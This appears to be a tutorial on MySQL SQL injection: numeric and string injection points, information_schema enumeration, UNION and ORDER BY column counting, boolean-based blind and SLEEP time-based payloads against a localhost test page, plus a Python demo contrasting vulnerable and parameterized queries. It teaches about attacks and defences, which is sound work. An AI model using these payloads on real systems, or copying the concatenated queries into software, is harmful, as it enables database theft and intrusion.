SQL injection classification
Numeric injection
$id = $_GET['id'];
$sql = "select * from users where id=$id LIMIT 0, 1";
String injection
$id = $_GET['id'];
$sql = "select * from users where id='$id' LIMIT 0, 1";
MySQL injection
The information_schema database
(1) SCHEMATA stores information about all databases.
show databases; # equivalent to select * from information_schema.SCHEMATA;
(2) TABLES stores information about the tables in each database.
select table_schema, table_name from information_schema.tables where table_schema='mysql';
(3) COLUMNS stores information about the columns of each table.
select table_name, column_name from information_schema.columns where table_schema='mysql';
(4) mysql.user stores the account information (host, user, authentication_string).
select host, user, authentication_string from mysql.user;
UNION: combined queries
select id, username from test1 union select 1, 2;
select id, username from test1 union select id, username from test2;
ORDER BY
select * from test1 order by username;
select * from test1 order by 2; # start at 1 and increase the index to determine the number of columns
UNION injection can only be used correctly once the column count is known.
select * from test1 where id=$id;
Injection:
http://localhost/test.php?id=1+order+by+4
MySQL boolean-based blind injection
Basic functions
(1) substring(string, start, len) returns a substring; start counts from 1
(2) ascii(char) returns the ASCII code of a character
(3) length(string) returns the length of a string
Examples
(1) Get the length of the database name
http://localhost/test.php?id=1 and (select length(database()))>5
(2) Get the current database name
http://localhost/test.php?id=1 and (select ascii(substring(database(), 1, 1)))>108
(3) Get the current table name
http://localhost/test.php?id=1 and ascii(substring((select table_name from information_schema.tables where table_schema='test1' limit 0, 1), 1, 1))>100
(4) Get a username
http://localhost/test.php?id=1 and ascii(substring((select username from test1 limit 0, 1), 1, 1))>100
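As an added example (not code from the original page), the numeric and string PHP forms from the classification section are rewritten in Python against an in-memory sqlite3 table that stands in for the MySQL `users` table (constructed data; sqlite3 is an assumption made so the example runs offline), each beside a hardened version that checks the type and binds the value. The boolean probe from the blind-injection section is used to show that the true/false oracle exists only while the input is pasted into the SQL text.

```python
import sqlite3

# Constructed demo data: sqlite3 in memory stands in for the MySQL `users`
# table queried by the page's PHP snippets (schema assumed, not from the page).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (id integer primary key, username text)")
    conn.executemany("insert into users values (?, ?)",
                     [(1, "alice"), (2, "bob"), (3, "carol")])
    return conn

def numeric_vulnerable(conn, id_param):
    # Same shape as the page's numeric form: $id is pasted into the SQL text.
    sql = f"select id, username from users where id={id_param} limit 1"
    return conn.execute(sql).fetchall()

def string_vulnerable(conn, id_param):
    # Same shape as the page's string form: quoted, but still pasted in.
    sql = f"select id, username from users where id='{id_param}' limit 1"
    return conn.execute(sql).fetchall()

def numeric_safe(conn, id_param):
    # Hardened form: enforce the expected type, then bind the value.
    try:
        id_value = int(id_param)
    except ValueError:
        return []          # reject instead of letting SQL see the raw text
    sql = "select id, username from users where id=? limit 1"
    return conn.execute(sql, (id_value,)).fetchall()

def string_safe(conn, id_param):
    # Hardened form: bound parameter, so quotes in the input are only data.
    sql = "select id, username from users where id=? limit 1"
    return conn.execute(sql, (id_param,)).fetchall()

if __name__ == "__main__":
    conn = make_db()
    # The boolean oracle from the page: the id=1 row is returned only when
    # the appended condition is true, leaking one bit per request.
    true_probe = "1 and (select length(username) from users where id=2)>2"
    false_probe = "1 and (select length(username) from users where id=2)>5"
    print(numeric_vulnerable(conn, true_probe))   # [(1, 'alice')]
    print(numeric_vulnerable(conn, false_probe))  # []
    print(numeric_safe(conn, true_probe))         # []  (input rejected)
    print(string_vulnerable(conn, "x' or username='bob"))  # [(2, 'bob')]
    print(string_safe(conn, "x' or username='bob"))        # []
```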
MySQL SLEEP injection
The sleep function
sleep(N) pauses for N seconds
The if function
if(expression, T, F) evaluates expression and returns T if it is true, otherwise F
sleep injection
http://localhost/test.php?id=1 and sleep(if(ascii(substring(database(), 1, 1))>100, 5, 0));